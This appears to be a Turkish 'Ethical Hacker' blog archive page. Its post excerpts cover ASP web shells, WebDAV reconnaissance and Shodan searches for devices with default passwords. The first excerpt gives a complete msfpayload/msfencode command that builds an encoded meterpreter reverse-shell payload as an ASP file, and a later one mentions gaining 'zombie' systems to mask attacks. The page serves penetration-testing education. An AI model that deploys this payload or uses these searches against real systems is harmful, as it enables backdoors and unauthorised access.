Archive for the ‘ Ethical Hacker ’ Category

ASP encode ile reverse shell – msfencode

Windows Web sunuculara yapılan ataklar sonrası, saldırgan sistemde bir arkakapı oluşturmak, sistemde komut çalıştırmak ve yetki yükseltmek için çeşitli web tabanlı scriptler kullanırlar.Bilinen en meşhurları arasında cyberspy5.asp , zehir4.asp, efso.asp ve  .net ile yazılmış FSO (file system object) fonksiyonlarını kullanan yazılımlar bulunuyor. Bu tür yazılımların ortak özelliği, FSO kullanarak dosya dizin işlemlerini gerçekleştirmek, sistemde komut çalıştırmak, port açabilmek ve uzak bir sisteme bağlantı gerçekleştirebilmektir.

Bu kadar bilinir olmaları antivirus, kaçak giriş tespit sistemleri  ve wep application firewall’lar tarafından kolayca engellenmelerine olanak sağlıyor.

Metasploit Exploit Framework ile, msfpayload ve msfencode yardımcı araçları kullanılarak meterpreter payloadını asp olarak encode edip  bind shell veya reverse shell bağlantısı kurulabilir.

Bu örnekte ters bağlantı (reverse connetion) kullanılmıştır.

# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 R | ./msfencode -t asp -o ajan443.asp

[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

 

Read more

Webdav Servisine Yönelik Keşif Çalışmaları

WEBDAV Servisi Nedir / Nasıl Çalışır ?

WEBDAV (Web-based Distributed Authoring and Versioning ) servisi, web üzerinden dosya/dizin paylaşmayı sağlar. HTTP 1.1 protokolü ile çalışır. Kritik bir öneme sahiptir, sık çıkan güvenlik zaafiyetleri ve yanlış yapılandırma ile ciddi güvenlik riskleri oluşturmaktadır.Bu yazıda webdav servislerinin tespit edilmesi ve IIS 6.0 webdav zayıflığını sömürmekten bahsedilmiştir.

 

IIS Webdav Yapılandırma Read more

Shodanhq Pentest Çalışmaları (cisco, default password,ssh)

Penetration Testing

  • Hiç bir koşulda kimlik doğrulama gerektirmeyen cihazlara erişimim olabilir mi ?
  • Varsayılan kullanıcı adı ve parola ile internet dünyasına açık sistemler nelerdir ?
  • Herhangi bir cihazın konfigurasyon dosyasını değiştirebilir miyim ?
  • Zombi sistemler, saldırılar için maskeleme yapacak kurban sistemler elde edebilir miyim ?

Default Parolalar Read more

Pentest Çalışmalarında Shodanhq ile Gelişmiş Arama

Shodanhq.org arama motorunda pentest çalışmaları için gelişmiş aramalar yapabilirsiniz.  Filtreleme için kullanılan operatörler

  • country: Tarama sonuçlarını ülkelere göre yapmayı sağlar. Ülkenin iki haneli kodunu belirtmeniz yeterlidir. country: tr, country: us country: de gibi
  • hostname: Filtreleme sonuçlarını spesifik bir domain veya host adına göre sıralamayı sağlar. hostname: .com.tr
  • net: Bir IP aralıı veya  Subnet e göre sonuç üretir. net: 195.175.39.0/24
  • os: Belirtilen işletim sistemine göre arama yapmayı sağlar. os: Linux
  • port: Özel servisler için aramayı sağlar. 21, 22, 23, 80 veya 443

Filtreleme operatörlerini kullanarak örnek bir arama; Türkiye’de .tr uzantılı port 21 den çalışan proftpd servisi kullanan sistemleri listeler

Read more

 
Hosting Sponsorumuz